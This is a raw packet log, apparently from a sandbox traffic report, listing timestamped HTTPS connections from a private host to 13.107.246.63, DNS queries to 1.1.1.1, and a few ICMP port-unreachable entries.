                                                                        Dec 3, 2024 17:52:18.714598894 CET50026443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.714633942 CET4435002613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.714693069 CET50026443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.714833021 CET50026443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.714847088 CET4435002613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.771006107 CET4435002213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.771032095 CET4435002213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.771104097 CET50022443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.771132946 CET4435002213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.771373987 CET50022443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.771388054 CET4435002213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.771395922 CET50022443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.771549940 CET4435002213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.771584034 CET4435002213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.771625042 CET50022443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.774281979 CET50027443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.774305105 CET4435002713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.774404049 CET50027443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.774554968 CET50027443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.774564981 CET4435002713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.868119001 CET4435002313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.868709087 CET50023443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.868726969 CET4435002313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:18.869175911 CET50023443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:18.869182110 CET4435002313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.323374987 CET4435002313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.323401928 CET4435002313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.323487997 CET50023443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:19.323522091 CET4435002313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.323667049 CET50023443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:19.323682070 CET4435002313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.323689938 CET50023443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:19.323857069 CET4435002313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.323889971 CET4435002313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.323924065 CET50023443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:19.326199055 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:19.326245070 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.326307058 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:19.326417923 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:19.326432943 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.878113031 CET4435002413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.878993034 CET50024443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:19.879014969 CET4435002413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:19.879461050 CET50024443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:19.879466057 CET4435002413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.162167072 CET4435002513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.163203955 CET50025443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.163232088 CET4435002513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.163752079 CET50025443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.163759947 CET4435002513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.419322014 CET4435002413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.419397116 CET4435002413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.419437885 CET50024443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.419596910 CET50024443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.419617891 CET4435002413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.419629097 CET50024443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.419635057 CET4435002413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.423229933 CET50029443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.423255920 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.423325062 CET50029443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.423765898 CET50029443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.423779011 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.610770941 CET4435002513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.610862970 CET4435002513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.611020088 CET50025443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.614433050 CET50025443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.614445925 CET4435002513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.614454985 CET50025443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.614459038 CET4435002513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.649471045 CET4435002613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.658767939 CET50026443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.658780098 CET4435002613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.662636995 CET50026443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.662642002 CET4435002613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.685285091 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.685353994 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.685441017 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.689151049 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.689183950 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.693494081 CET4435002713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.701164961 CET50027443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.701179028 CET4435002713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:20.705331087 CET50027443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:20.705339909 CET4435002713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.107229948 CET4435002613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.107306004 CET4435002613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.107398987 CET50026443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.107527018 CET50026443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.107527018 CET50026443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.107549906 CET4435002613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.107558966 CET4435002613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.110637903 CET50031443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.110678911 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.110749006 CET50031443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.110888958 CET50031443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.110903025 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.140887976 CET4435002713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.144150972 CET4435002713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.144205093 CET50027443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.144244909 CET50027443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.144256115 CET4435002713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.144269943 CET50027443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.144278049 CET4435002713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.146976948 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.146991014 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.147098064 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.147223949 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.147234917 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.273783922 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.274355888 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.274389982 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.274805069 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.274811983 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.741363049 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.741394997 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.741486073 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.741503000 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.741688967 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.741780043 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.741786003 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.741800070 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.741986990 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.742019892 CET4435002813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.742074966 CET50028443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.744620085 CET50033443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.744657993 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:21.744751930 CET50033443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.744885921 CET50033443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:21.744899035 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:22.232779980 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:22.233241081 CET50029443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:22.233264923 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:22.233722925 CET50029443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:22.233728886 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:22.900121927 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:22.900753975 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:22.900782108 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:22.901223898 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:22.901231050 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.019208908 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.019243956 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.019309998 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.019382954 CET50029443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.019418001 CET50029443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.019653082 CET50029443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.019676924 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.019689083 CET50029443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.019699097 CET4435002913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.022943020 CET50034443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.022985935 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.023058891 CET50034443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.023216963 CET50034443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.023231030 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.072604895 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.073096991 CET50031443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.073110104 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.073501110 CET50031443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.073508978 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.132122040 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.132649899 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.132671118 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.133255005 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.133260965 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.410145044 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.410176992 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.410197973 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.410232067 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.410248995 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.410263062 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.410294056 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.536504030 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.536529064 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.536581039 CET50031443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.536592007 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.536636114 CET50031443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.536780119 CET50031443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.536797047 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.536807060 CET50031443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.536812067 CET4435003113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.539508104 CET50035443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.539549112 CET4435003513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.539628029 CET50035443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.539819956 CET50035443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.539834023 CET4435003513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.577279091 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.577362061 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.577377081 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.577394962 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.577456951 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.577495098 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.577512980 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.577523947 CET50030443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.577533007 CET4435003013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.580586910 CET50036443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.580612898 CET4435003613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.580667019 CET50036443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.580852985 CET50036443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.580864906 CET4435003613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.640398026 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.640431881 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.640450001 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.640486956 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.640500069 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.640542030 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.640556097 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.667249918 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.670845032 CET50033443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.670860052 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.671442032 CET50033443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.671452999 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.830466032 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.830517054 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.830539942 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.830559015 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.830574036 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.830643892 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.830643892 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.830643892 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.830868006 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.830868006 CET50032443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.830883026 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.830890894 CET4435003213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.833444118 CET50037443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.833481073 CET4435003713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:23.833542109 CET50037443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.834013939 CET50037443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:23.834026098 CET4435003713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.126805067 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.126830101 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.126893997 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.126923084 CET50033443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:24.126957893 CET50033443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:24.127172947 CET50033443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:24.127192020 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.127204895 CET50033443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:24.127211094 CET4435003313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.129853964 CET50038443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:24.129884005 CET4435003813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.129966021 CET50038443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:24.130083084 CET50038443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:24.130094051 CET4435003813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.808769941 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.809731960 CET50034443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:24.809753895 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:24.810189962 CET50034443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:24.810197115 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.381978989 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.382004976 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.382061958 CET50034443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.382086992 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.382343054 CET50034443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.382353067 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.382360935 CET50034443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.382527113 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.382560968 CET4435003413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.382647038 CET50034443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.385070086 CET50039443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.385111094 CET4435003913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.385184050 CET50039443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.385334015 CET50039443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.385346889 CET4435003913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.424289942 CET4435003513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.424969912 CET50035443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.424989939 CET4435003513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.425611973 CET50035443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.425617933 CET4435003513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.792283058 CET4435003613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.792989016 CET50036443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.793020010 CET4435003613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.793385983 CET50036443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.793391943 CET4435003613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.794039011 CET4435003713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.794308901 CET50037443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.794327021 CET4435003713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:52:25.794653893 CET50037443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:52:25.794657946 CET4435003713.107.246.63192.168.2.4
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 3, 2024 17:49:27.660437107 CET6127953192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:27.661113977 CET6097353192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:27.799993038 CET53561401.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:27.898919106 CET53612791.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:27.907170057 CET53609731.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:28.465404034 CET53645931.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:31.377463102 CET6364153192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:31.377661943 CET5134153192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:31.461294889 CET53497561.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:31.517822981 CET53636411.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:31.621586084 CET53513411.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:31.633147001 CET5760353192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:31.633330107 CET5798053192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:31.770998001 CET53576031.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:31.771024942 CET53579801.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:32.820708036 CET5328053192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:37.161744118 CET5931553192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:37.161961079 CET5807853192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:37.469763994 CET53580781.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:37.469789028 CET53593151.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:39.437181950 CET6261953192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:39.437350035 CET5829853192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:40.508248091 CET5458653192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:40.508399963 CET5276953192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:40.601001024 CET53626191.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:40.601695061 CET53582981.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:40.647917032 CET53527691.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:40.648082972 CET53545861.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:44.374347925 CET138138192.168.2.4192.168.2.255
                                                                        Dec 3, 2024 17:49:46.305804968 CET5717253192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:46.305939913 CET5072453192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:46.317207098 CET4991853192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:46.317354918 CET6166053192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:46.530491114 CET53571721.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:46.633208990 CET53507241.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:46.633224010 CET53513891.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:46.633232117 CET53616601.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:46.633235931 CET53499181.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:48.581543922 CET5903353192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:48.581543922 CET6388653192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:48.582461119 CET5159653192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:48.582461119 CET5089453192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:48.710618973 CET53532261.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:48.719578981 CET53515961.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:48.720115900 CET53508941.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:48.925434113 CET53590331.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:48.988003016 CET53638861.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:51.970135927 CET6004453192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:51.970494986 CET5972053192.168.2.41.1.1.1
                                                                        Dec 3, 2024 17:49:52.108850956 CET53600441.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:49:52.194808006 CET53597201.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:50:08.271830082 CET53534101.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:50:27.444133997 CET53570411.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:50:31.238980055 CET53604081.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:50:58.273698092 CET53521951.1.1.1192.168.2.4
                                                                        Dec 3, 2024 17:51:44.975385904 CET53516021.1.1.1192.168.2.4
                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                        Dec 3, 2024 17:49:31.621644974 CET192.168.2.41.1.1.1c21f(Port unreachable)Destination Unreachable
                                                                        Dec 3, 2024 17:49:40.648261070 CET192.168.2.41.1.1.1c232(Port unreachable)Destination Unreachable
                                                                        Dec 3, 2024 17:49:46.633411884 CET192.168.2.41.1.1.1c209(Port unreachable)Destination Unreachable
